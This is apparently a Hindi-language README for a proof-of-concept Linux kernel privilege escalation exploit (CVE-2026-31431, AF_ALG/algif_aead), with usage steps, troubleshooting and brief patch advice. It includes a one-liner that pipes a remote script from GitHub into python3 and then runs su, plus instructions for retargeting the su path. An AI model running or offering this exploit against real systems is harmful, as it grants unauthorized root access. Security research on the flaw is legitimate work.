
शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट जो AF_ALG algif_aead (CVE-2026-31431) के माध्यम से Linux कर्नेल स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है। रक्षात्मक अनुसंधान के लिए उपयोग निर्देश और शमन मार्गदर्शन शामिल है।
CVE-2026-31431 के लिए शैक्षिक प्रूफ ऑफ कॉन्सेप्ट, जिसे कॉपी फेल के नाम से भी जाना जाता है, एक Linux कर्नेल स्थानीय विशेषाधिकार वृद्धि भेद्यता है जिसमें AF_ALG / algif_aead क्रिप्टोग्राफिक इंटरफ़ेस शामिल है।
[!WARNING] यह रिपॉजिटरी केवल शैक्षिक, रक्षात्मक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है।
इस कोड को उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या उन सिस्टमों पर जहां आपके पास परीक्षण करने की स्पष्ट लिखित अनुमति नहीं है।
अनधिकृत उपयोग अवैध हो सकता है।
CVE-2026-31431 एक Linux कर्नेल स्थानीय विशेषाधिकार वृद्धि भेद्यता है जो कर्नेल क्रिप्टोग्राफिक सबसिस्टम को प्रभावित करती है।
यह भेद्यता AF_ALG इंटरफ़ेस के माध्यम से उजागर AEAD पथ से संबंधित है और यह एक स्थानीय अनविशेषाधिकार प्राप्त उपयोगकर्ता को पठनीय फ़ाइलों से जुड़े पेज कैश डेटा के साथ हस्तक्षेप करने की अनुमति दे सकती है, जिससे संभावित रूप से कमजोर सिस्टमों पर विशेषाधिकार वृद्धि हो सकती है।
इस रिपॉजिटरी में नियंत्रित प्रयोगशाला वातावरण के लिए एक न्यूनतम शैक्षिक प्रूफ ऑफ कॉन्सेप्ट शामिल है।
लक्ष्य सिस्टम को आवश्यक AF_ALG AEAD एल्गोरिथ्म उजागर करना चाहिए।
आप इसे इस प्रकार जांच सकते हैं:
grep -i "authencesn\|authenc" /proc/crypto
PoC निम्नलिखित के समान एल्गोरिथ्म के लिए समर्थन की अपेक्षा करता है:
authencesn(hmac(sha256),cbc(aes))
यदि एल्गोरिथ्म उपलब्ध नहीं है, तो PoC निम्नलिखित जैसी त्रुटि के साथ विफल हो सकता है:
FileNotFoundError: [Errno 2] No such file or directory
इसका मतलब है कि आवश्यक कर्नेल क्रिप्टो एल्गोरिथ्म सिस्टम पर उपलब्ध नहीं है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431
PoC चलाएं:
python3 poc.py
या इसे सीधे चलाएं:
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su
कुछ Linux सिस्टम /usr/bin/su के बजाय /bin/su का उपयोग करते हैं। आप सही पथ इस प्रकार जांच सकते हैं:
which su
यदि आवश्यक हो, तो poc.py के अंदर लक्ष्य पथ को समायोजित करें।
यदि आपको authencesn(hmac(sha256),cbc(aes)) से बाइंड करते समय FileNotFoundError: [Errno 2] No such file or directory मिलता है, तो आवश्यक कर्नेल एल्गोरिथ्म अनुपलब्ध है।
उपलब्ध क्रिप्टो एल्गोरिथ्म जांचें:
cat /proc/crypto
या अधिक विशेष रूप से:
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto
यदि PoC /usr/bin/su को संदर्भित करता है लेकिन आपका सिस्टम /bin/su का उपयोग करता है, तो इस प्रकार जांचें:
which su
फिर तदनुसार poc.py में पथ अपडेट करें।
रक्षकों को अपने वितरण विक्रेता द्वारा प्रदान किए गए पैच किए गए Linux कर्नेल संस्करण में अपडेट करना चाहिए।
कर्नेल को अपडेट करने के बाद, यह सुनिश्चित करने के लिए सिस्टम को रिबूट करें कि पैच किया गया कर्नेल सक्रिय है।
अस्थायी शमन में वातावरण और वितरण के आधार पर प्रभावित कर्नेल क्रिप्टो कार्यक्षमता तक पहुंच को प्रतिबंधित करना शामिल हो सकता है।
यह प्रोजेक्ट केवल निम्नलिखित के लिए है:
लेखक इस कोड के कारण होने वाले दुरुपयोग, क्षति या अवैध गतिविधि के लिए जिम्मेदार नहीं है।
केवल उन सिस्टमों पर उपयोग करें जहां आपके पास स्पष्ट प्राधिकरण है।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।